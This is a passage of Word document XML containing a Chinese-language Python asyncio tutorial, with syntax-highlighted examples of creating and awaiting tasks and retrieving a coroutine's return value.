          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'world'</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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">f"started at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>strftime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'%X'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># Wait until both tasks are completed (should take around 2 seconds.)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>task1</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>task2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">f"finished at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>strftime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'%X'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23728F1E" w14:textId="77777777" w:rsidR="00507FD6" w:rsidRDefault="00507FD6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C8F83A" w14:textId="2A78831E" w:rsidR="004D792F" w:rsidRDefault="00EA63A8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="004D792F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65020CB1" w14:textId="77777777" w:rsidR="004D792F" w:rsidRPr="007E6697" w:rsidRDefault="004D792F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5206EFEA" w14:textId="77777777" w:rsidR="002B2E5B" w:rsidRDefault="002B2E5B" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>foo</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">'hello'  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>协程的返回值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>main</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task = asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>create_task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">())  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>协程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">result = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">task  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>协程完成，并获取其返回值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(result)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'hello'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>main</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r>
    </w:p>
    <w:p w14:paraId="32F4AC1E" w14:textId="77777777" w:rsidR="00AE0232" w:rsidRPr="002B2E5B" w:rsidRDefault="00AE0232" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF92431" w14:textId="582698DD" w:rsidR="00AE0232" w:rsidRDefault="00507FD6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>大量</w:t>
      </w:r>
      <w:r w:rsidR="001C6EBC">
        <w:rPr>
